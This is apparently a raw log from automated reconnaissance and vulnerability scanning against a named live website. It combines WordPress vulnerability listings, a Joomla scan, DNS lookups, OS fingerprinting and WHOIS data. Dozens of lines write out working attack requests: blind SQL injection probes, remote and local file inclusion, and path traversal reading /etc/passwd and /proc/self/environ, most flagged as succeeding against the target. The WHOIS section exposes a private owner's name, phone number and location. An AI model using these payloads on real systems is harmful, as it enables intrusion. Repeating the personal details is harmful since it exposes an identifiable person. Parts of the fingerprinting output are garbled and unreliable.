- | Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
- | Fixed in: 4.5.7
- | Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
- | Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- | Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
- | Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
- | Reference: http://seclists.org/oss-sec/2017/q1/562
- | Reference: https://hackerone.com/reports/153093
- | Fixed in: 4.5.7
- | Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
- | Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
- | Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
- | Reference: https://core.trac.wordpress.org/ticket/25239
- | Fixed in: None
- | Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
- | Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
- | Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- | Fixed in: 4.5.9
- | Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
- | Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- | Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
- | Fixed in: 4.5.9
- | Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
- | Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- | Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
- | Fixed in: 4.5.9
- | Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
- | Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- | Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
- | Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
- | Fixed in: 4.5.9
- | Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
- | Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- | Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
- | Reference: https://hackerone.com/reports/203515
- | Reference: https://hackerone.com/reports/203515
- | Fixed in: 4.5.9
- | Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
- | Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- | Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
- | Fixed in: 4.5.9
- | Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
- | Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- | Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
- | Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
- | Fixed in: 4.5.10
- | Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
- | Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
- | Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- | Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
- | Reference: https://wpvulndb.com/vulnerabilities/8905
- | Fixed in: 4.7.5
- | Title: WordPress 2.9.2-4.8.1 - Open Redirect
- | Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- | Reference: https://core.trac.wordpress.org/changeset/41398
- | Fixed in: 4.5.10
- | Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
- | Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- | Reference: https://core.trac.wordpress.org/changeset/41457
- | Fixed in: 4.5.10
- | Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
- | Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- | Reference: https://core.trac.wordpress.org/changeset/41448
- | Fixed in: 4.5.10
- | Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
- | Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- | Reference: https://core.trac.wordpress.org/changeset/41395
- | Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
- | Fixed in: 4.5.10
- | Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
- | Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
- | Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
- | Reference: https://twitter.com/ircmaxell/status/923662170092638208
- | Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
- | Fixed in: 4.5.11
- | Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
- | Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- | Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
- | Fixed in: 4.5.12
- | Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
- | Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- | Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
- | Fixed in: 4.5.12
- | Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
- | Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- | Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
- | Fixed in: 4.5.12
- | Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
- | Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- | Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
- | Fixed in: 4.5.12
- [*] Passive enumerate themes..
- [+] Name: blue-summit-wp-bootstrap
- | Theme Name: Flybox
- | Style: https://www.flybox.co.il/wp-content/themes/blue-summit-wp-bootstrap/style.css
- [*] Passive enumerate plugins..
- [+] Name: popup-builder';SG_POPUP_VERSION='2.31_1'<
- [+] Name: accordions
- | Readme: https://www.flybox.co.il/wp-content/plugins/accordions/readme.txt
- Target: http://flybox.co.il
- Server: cloudflare
- X-Powered-By: PHP/7.0.13
- ## Checking if the target has deployed an Anti-Scanner measure
- [!] Scanning Passed ..... OK
- ## Detecting Joomla! based Firewall ...
- [!] A Joomla! RS-Firewall (com_rsfirewall/com_firewall) is detected.
- [!] The vulnerability probing may be logged and protected.
- [!] A Joomla! J-Firewall (com_jfw) is detected.
- [!] The vulnerability probing may be logged and protected.
- [!] A SecureLive Joomla!(mod_securelive/com_securelive) firewall is detected.
- [!] The vulnerability probing may be logged and protected.
- [!] A SecureLive Joomla! firewall is detected.
- [!] The vulnerability probing may be logged and protected.
- [!] FWScript(from firewallscript.com) is likely to be used.
- [!] The vulnerability probing may be logged and protected.
- [!] A Joomla! security scanner (com_joomscan/com_joomlascan) is detected.
- [!] It is likely that webmaster routinely checks insecurities.
- [!] A security scanner (com_securityscanner/com_securityscan) is detected.
- [!] A Joomla! jSecure Authentication is detected.
- [!] You need additional secret key to access /administrator directory
- [!] Default is jSecure like /administrator/?jSecure ;)
- [!] A Joomla! GuardXT Security Component is detected.
- [!] It is likely that webmaster routinely checks for insecurities.
- [!] A Joomla! JoomSuite Defender is detected.
- [!] The vulnerability probing may be logged and protected.
- ## Fingerprinting in progress ...
- ~Unable to detect the version. Is it sure a Joomla?
- ## Fingerprinting done.
- Vulnerabilities Discovered
- ==========================
- # 1
- Info -> Generic: htaccess.txt has not been renamed.
- Versions Affected: Any
- Check: /htaccess.txt
- Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
- Vulnerable? Yes
- # 39
- Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
- Versions effected: N/A
- Check: /components/com_banners/
- Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
- Vulnerable? Yes
- # 123
- Info -> Component: custompages Remote File Inclusion Vulnerability
- Versions Affected: 1.1 <=
- Check: /components/com_custompages/
- Exploit: /index.php?option=com_custompages&cpage=
- Vulnerable? Yes
- # 207
- Info -> Component: com_mycontent Blind SQL Injection Vulnerability
- Version Affected: N/A
- Check: /components/com_mycontent/
- Exploit: /index.php?option=com_mycontent&task=view&id=1+and+1=1::/index.php?option=com_mycontent&task=view&id=1+and+1=2
- Vulnerable? Yes
- # 208
- Info -> Component: Joo!BB Blind SQL Injection Vulnerability
- Version Affected: 0.5.9 or lower
- Check: /components/com_joobb/
- Exploit: /index.php?option=com_joobb&view=forum&forum=1+and+1=1::/index.php?option=com_joobb&view=forum&forum=1+and+1=2
- Vulnerable? Yes
- # 209
- Info -> Component: acctexp Blind SQL Injection Vulnerability
- Version Affected: <= 0.12
- Check: /components/com_acctexp/
- Exploit: /index.php?option=com_acctexp&task=subscribe&usage=1+and+1=1::/index.php?option=com_acctexp&task=subscribe&usage=1+and+1=2
- Vulnerable? Yes
- # 213
- Info -> Component: JooBlog Blind SQL Injection Vulnerability
- Version Affected: 0.1.1<=
- Check: /components/com_jb2/
- Exploit: /index.php?option=com_jb2&view=category&CategoryID=1+and+1=1::/index.php?option=com_jb2&view=category&CategoryID=1+and+1=2
- Vulnerable? Yes
- # 214
- Info -> Component: jotloader Blind SQL Injection Vulnerability
- Version Affected: 1.2.1.a<=
- Check: /components/com_jotloader/
- Exploit: /index.php?option=com_jotloader&cid=1+and+1=1::/index.php?option=com_jotloader&cid=1+and+1=2
- Vulnerable? Yes
- # 220
- Info -> Component: News Portal Blind SQL Injection Vulnerability
- Version Affected: 1.0 <=
- Check: /components/com_news_portal/
- Exploit: /index.php?option=com_news_portal&Itemid=1+and+1=1::/index.php?option=com_news_portal&Itemid=1+and+1=2
- Vulnerable? Yes
- # 232
- Info -> Component: com_ezstore Blind SQL Injection Vulnerability
- Version Affected: N/A
- Check: /components/com_ezstore/
- Exploit: /index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+1=1::/index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+1=2
- Vulnerable? Yes
- # 243
- Info -> Component: Archaic Binary Gallery Directory Traversal Vulnerability
- Version Affected: 1.0<=
- Check: /components/com_ab_gallery/
- Exploit: /index.php?option=com_ab_gallery&Itemid=37&gallery=_NOT_EXIST
- Vulnerable? Yes
- # 248
- Info -> Component: ProDesk (com_pro_desk) Local File Inclusion Vulnerability
- Version Affected: 1.2<=
- Check: /components/com_pro_desk/
- Exploit: /index.php?option=com_pro_desk&include_file=
- Vulnerable? Yes
- # 264
- Info -> Component: Com Profiler Blind SQL Injection Vulnerability
- Versions effected: 1.0 RC2 and older
- Check: /administrator/components/com_comprofiler/
- Exploit: /index.php?option=com_comprofiler&task=userProfile&user=1+and+1=1::/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2
- Vulnerable? Yes
- # 302
- Info -> Component: com_ijoomla_archive (catid) Blind SQL Injection Vulnerability
- Versions Affected: N/A
- Check: /components/com_ijoomla_archive/
- Exploit: /index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=1::/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=2
- Vulnerable? Yes
- # 339
- Info -> Component: com_letterman Remote File Inclusion Vulnerability
- Versions effected: N/A
- Check: /components/com_letterman/
- Exploit: /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=
- Vulnerable? Yes
- # 345
- Info -> Component: com_hbssearch Blind SQL Injection Vulnerability
- Versions Affected: N/A
- Check: /components/com_hbssearch/
- Exploit: /index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=1::/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=2
- Vulnerable? Yes
- # 348
- Info -> Component: com_lowcosthotels (id) Blind SQL Injection Vulnerability
- Versions Affect: N/A
- Check: /components/com_lowcosthotels/
- Exploit: /index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=2
- Vulnerable? Yes
- # 349
- Info -> Component: com_allhotels (id) Blind SQL Injection Vulnerability
- Versions Affect: N/A
- Check: /components/com_allhotels/
- Exploit: /index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=2
- Vulnerable? Yes
- # 350
- Info -> Component: com_ice(catid) Blind SQL Injection Vulnerability
- Versions Affected: N/A
- Check: /components/com_ice/
- Exploit: /index.php?option=com_ice&catid=1 and 1=1::/index.php?option=com_ice&catid=1 and 1=2
- Vulnerable? Yes
- # 355
- Info -> Component: com_na_content Blind SQL Injection Vulnerability
- Versions effected: v 1.0 <=
- Check: /components/com_na_content/
- Exploit: /index.php?option=com_na_content&task=view&id=1+and+1=1::/index.php?option=com_na_content&task=view&id=1+and+1=2
- Vulnerable? Yes
- # 375
- Info -> Component: PC CookBook Blind SQL Injection Vulnerability
- Versions effected: N/A
- Check: /components/com_pccookbook/
- Exploit: /index.php?option=com_pccookbook&page=viewrecipe&recipe_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
- Vulnerable? Yes
- # 376
- Info -> Component: com_waticketsystem Blind SQL Injection Vulnerability
- Versions effected: N/A
- Check: /components/com_waticketsystem/
- Exploit: /index.php?option=com_waticketsystem&act=category&catid=1+and+1=1::/index.php?option=com_waticketsystem&act=category&catid=1+and+1=2
- Vulnerable? Yes
- # 379
- Info -> Component: com_rss DOS Vulnerability
- Versions effected: Joomla! <= 1.0.7
- Check: /components/com_rss/
- Exploit: /index2.php?option=com_rss&feed=test
- Vulnerable? Yes
- # 388
- Info -> Component: Seminar com_seminar Blind SQL Injection Vulnerability
- Versions effected: 2.0.4 <=
- Check: /components/com_seminar/
- Exploit: /index.php?option=com_seminar&task=View_seminar&id=1+and+1=1::index.php?option=com_seminar&task=View_seminar&id=1+and+1=2
- Vulnerable? Yes
- # 389
- Info -> Component: Omilen Photo Gallery Local File Inclusion Vulnerability
- Versions effected: 0.5b <=
- Check: /components/com_omphotogallery/
- Exploit: /index.php?option=com_omphotogallery&controller=
- Vulnerable? Yes
- # 403
- Info -> Component: com_projectfork Local File Inclusion Vulnerability
- Versions effected: 2.0.10 <=
- Check: /components/com_projectfork/
- Exploit: /index.php?option=com_projectfork§ion=
- Vulnerable? Yes
- # 437
- Info -> Component: com_clickheat Remote File Inclusion Vulnerability
- Versions effected: N/A
- Check: /components/com_clickheat/
- Exploit: /index.php?option=com_ clickheat&task=
- Vulnerable? Yes
- # 454
- Info -> Component: Almond Classifieds com_aclassf (id) Blind SQL Injection Vulnerability
- Versions effected: 5.6.2 <=
- Check: /components/com_aclassf/
- Exploit: /index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=1::/index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=2
- Vulnerable? Yes
- # 455
- Info -> Component: Almond Classifieds com_aclassf (replid) Blind SQL Injection Vulnerability
- Versions effected: 7.5 <=
- Check: /components/com_aclassf/
- Exploit: /index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=1::/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=2
- Vulnerable? Yes
- # 459
- Info -> Component: Kunena Forums com_kunena (func) Blind SQL Injection Vulnerability
- Versions effected: N/A
- Check: /components/com_kunena/
- Exploit: /index.php?option=com_kunena&Itemid=-3&func=1+and+1=1::/index.php?option=com_kunena&Itemid=-3&func=1+and+1=2
- Vulnerable? Yes
- # 460
- Info -> Component: com_misterestate Blind SQL Injection Vulnerability
- Versions effected: N/A
- Check: /components/com_misterestate/
- Exploit: /index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=1::/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=2
- Vulnerable? Yes
- # 468
- Info -> Component: JE Guestbook 1.0 Joomla Component Multiple Remote Vulnerabilities: Local File Inclusion
- Versions Affected: 1.0
- Check: /index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
- Exploit: /index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 475
- Info -> Component: JPhone 1.0 Alpha 3 Component Joomla Local File Inclusion
- Versions Affected: 1.0 Alpha 3
- Check: /index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
- Exploit: /index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 476
- Info -> Component: JPhone 1.0 Alpha 3 Component Joomla Local File Inclusion
- Versions Affected: 1.0 Alpha 3
- Check: /index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
- Exploit: /index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
- Vulnerable? Yes
- # 494
- Info -> Component: Jgrid Local File Inclusion
- Versions Affected: 1.0
- Check: /index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
- Exploit: /index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 523
- Info -> Component: Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerability
- Versions Affected: Any
- Check: /index.php?option=com_seyret&view=
- Exploit: /index.php?option=com_seyret&view=
- Vulnerable? Yes
- # 525
- Info -> Component: Joomla Component (com_obSuggest) Local File Inclusion Vulnerability
- Versions Affected: Any
- Check: /index.php?option=com_obsuggest&controller=
- Exploit: /index.php?option=com_obsuggest&controller=
- Vulnerable? Yes
- # 528
- Info -> Component: Joomla Component Matamko Local File Inclusion Vulnerability
- Versions Affected: Any
- Check: /index.php?option=com_matamko&controller=
- Exploit: /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 534
- Info -> Component: Joomla Component (com_jimtawl) Local File Inclusion Vulnerability
- Versions Affected: Any
- Check: /index.php?option=com_jimtawl&Itemid=12&task=
- Exploit: /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00
- Vulnerable? Yes
- # 537
- Info -> Component: Joomla Component (com_connect) Local File Inclusion Vulnerability
- Versions Affected: Any
- Check: /index.php?option=com_connect&view=connect&controller=
- Exploit: /index.php?option=com_connect&view=connect&controller=../../../CREDITS.php%00
- Vulnerable? Yes
- # 538
- Info -> Component: Joomla com_quran SQL Injection vulnerability
- Versions Affected: Any
- Check: /component/quran/index.php?option=com_quran&action=viewayat&surano=
- Exploit: /component/quran/index.php?option=com_quran&action=viewayat&surano=
- Vulnerable? No
- # 544
- Info -> Component: YJ Contact us - Enhanced Joomla Contact Form Local File Inclusion
- Versions Affected: "Any"
- Check: /index.php?option=com_yjcontactus&view=
- Exploit: /index.php?option=com_yjcontactus&view=../../../../../../../../../../../../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 546
- Info -> Component: JoomTouch Local File Inclusion
- Versions Affected: 1.0.2
- Check: /index.php?option=com_joomtouch&controller=
- Exploit: /index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 551
- Info -> Component: Joomla Component FDione Form Wizard Local File Inclusion
- Versions Affected: 1.0.2 <=
- Check: /index.php?option=com_dioneformwizard&controller=[LFI]%00
- Exploit: /index.php?option=com_dioneformwizard&controller=[LFI]%00
- Vulnerable? Yes
- # 553
- Info -> Component: Component advertising Local File Inclusion
- Versions Affected: 2.0 <=
- Check: /index.php?option=com_aardvertiser&cat_name=conf&task=<=
- Exploit: /index.php?option=com_aardvertiser&cat_name=conf&task=
- Vulnerable? Yes
- # 554
- Info -> Component: Component advertising Local File Inclusion
- Versions Affected: 2.0 <=
- Check: /index.php?option=com_aardvertiser&task=
- Exploit: /index.php?option=com_aardvertiser&task=
- Vulnerable? Yes
- # 556
- Info -> Component: Custom PHP Pages Component Local File Inclusion
- Versions Affected: Any <=
- Check: /index.php?option=com_php&file=../images/phplogo.jpg
- Exploit: /index.php?option=com_php&file=../images/phplogo.jpg
- Vulnerable? Yes
- # 557
- Info -> Component: Custom PHP Pages Component Local File Inclusion
- Versions Affected: Any <=
- Check: /index.php?option=com_php&file=../js/ie_pngfix.js
- Exploit: /index.php?option=com_php&file=../js/ie_pngfix.js
- Vulnerable? Yes
- # 558
- Info -> Component: Custom PHP Pages Component Local File Inclusion
- Versions Affected: Any <=
- Check: /index.php?option=com_php&file=../../../../../../../../../../etc/passwd
- Exploit: /index.php?option=com_php&file=../../../../../../../../../../etc/passwd
- Vulnerable? Yes
- # 568
- Info -> Component: SmartSite Local File Inclusion
- Versions Affected: Any <=
- Check: /index.php?option=com_smartsite&controller=
- Exploit: /index.php?option=com_smartsite&controller=
- Vulnerable? Yes
- # 569
- Info -> Component: NoticeBoard Local File Inclusion
- Versions Affected: 1.3<=
- Check: /index.php?option=com_noticeboard&controller=
- Exploit: /index.php?option=com_noticeboard&controller=
- Vulnerable? Yes
- # 570
- Info -> Component: Ultimate Portfolio Local File Inclusion
- Versions Affected: 1.0<=
- Check: /index.php?option=com_ultimateportfolio&controller=
- Exploit: /index.php?option=com_ultimateportfolio&controller=
- Vulnerable? Yes
- # 590
- Info -> Component: Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability
- Versions Affected: Any <=
- Check: /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
- Exploit: /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 591
- Info -> Component: Joomla Component Deluxe Blog Factory com_blogfactory Local File Inclusion Vulnerability
- Versions Affected: Any <=
- Check: /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
- Exploit: /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 592
- Info -> Component: Joomla Component Delicious Bookmarks com_delicious Local File Inclusion Vulnerability
- Versions Affected: Any <=
- Check: /index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
- Exploit: /index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 593
- Info -> Component: Joomla Component JA Comment com_jacomment Local File Inclusion Vulnerability
- Versions Affected: Any <=
- Check: /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
- Exploit: /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 594
- Info -> Component: Joomla Component Love Factory com_lovefactory Local File Inclusion Vulnerability
- Versions Affected: Any <=
- Check: /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
- Exploit: /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 595
- Info -> Component: Joomla com_worldrates Local File Inclusion Vulnerability
- Versions Affected: Any <=
- Check: /index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
- Exploit: /index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 596
- Info -> Component: Joomla com_record Local File Inclusion Vulnerability
- Versions Affected: Any <=
- Check: /index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
- Exploit: /index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 597
- Info -> Component: Joomla Component JA Voice com_javoice Local File Inclusion vulnerability
- Versions Affected: Any <=
- Check: /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
- Exploit: /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- # 598
- Info -> Component: Joomla Component com_pcchess Local File Inclusion
- Versions Affected: Any <=
- Check: /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
- Exploit: /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
- Vulnerable? Yes
- [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +[0m
- Server: 192.168.1.254
- Address: 192.168.1.254#53
- Non-authoritative answer:
- Name: flybox.co.il
- Address: 104.31.75.239
- Name: flybox.co.il
- Address: 104.31.74.239
- Name: flybox.co.il
- Address: 2400:cb00:2048:1::681f:4bef
- Name: flybox.co.il
- Address: 2400:cb00:2048:1::681f:4aef
- flybox.co.il has address 104.31.74.239
- flybox.co.il has address 104.31.75.239
- flybox.co.il has IPv6 address 2400:cb00:2048:1::681f:4aef
- flybox.co.il has IPv6 address 2400:cb00:2048:1::681f:4bef
- flybox.co.il mail is handled by 75 alt2.aspmx.l.google.com.
- flybox.co.il mail is handled by 125 aspmx3.googlemail.com.
- flybox.co.il mail is handled by 50 alt1.aspmx.l.google.com.
- flybox.co.il mail is handled by 0 aspmx.l.google.com.
- flybox.co.il mail is handled by 100 aspmx2.googlemail.com.
- [92m + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +[0m
- Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
- [+] Target is flybox.co.il
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 104.31.75.239. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 104.31.75.239. Module test failed
- [-] No distance calculation. 104.31.75.239 appears to be dead or no ports known
- [+] Host: 104.31.75.239 is up (Guess probability: 50%)
- [+] Target: 104.31.75.239 is alive. Round-Trip Time: 0.49955 sec
- [+] Selected safe Round-Trip Time value is: 0.99909 sec
- [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
- [-] fingerprint:smb need either TCP port 139 or 445 to run
- [+] Primary guess:
- [+] Host 104.31.75.239 Running OS: »ÎlU (Guess probability: 100%)
- [+] Other guesses:
- [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
- [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
- [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
- [+] Host 104.31.75.239 Running OS: »ÎlU (Guess probability: 100%)
- [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
- [+] Host 104.31.75.239 Running OS: »ÎlU (Guess probability: 100%)
- [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
- [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
- [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- [92m + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +[0m
- % The data in the WHOIS database of the .il registry is provided
- % by ISOC-IL for information purposes, and to assist persons in
- % obtaining information about or related to a domain name
- % registration record. ISOC-IL does not guarantee its accuracy.
- % By submitting a WHOIS query, you agree that you will use this
- % Data only for lawful purposes and that, under no circumstances
- % will you use this Data to: (1) allow, enable, or otherwise
- % support the transmission of mass unsolicited, commercial
- % advertising or solicitations via e-mail (spam);
- % or (2) enable high volume, automated, electronic processes that
- % apply to ISOC-IL (or its systems).
- % ISOC-IL reserves the right to modify these terms at any time.
- % By submitting this query, you agree to abide by this policy.
- query: flybox.co.il
- reg-name: flybox
- domain: flybox.co.il
- descr: Ofer Bar
- descr: Kibutz Hulda
- descr: Kibutz Hulda
- descr: 11111
- descr: Israel
- phone: +972 54 3035371
- fax-no: +972 9 9574370
- admin-c: IS-OB5539-IL
- tech-c: IS-ID1078-IL
- zone-c: IS-ID1078-IL
- nserver: athena.ns.cloudflare.com
- nserver: vin.ns.cloudflare.com
- validity: 04-09-2019
- DNSSEC: unsigned
- status: Transfer Locked
- changed: domain-registrar AT isoc.org.il 20130904 (Assigned)
- changed: domain-registrar AT isoc.org.il 20161012 (Changed)
- person: Ofer Bar
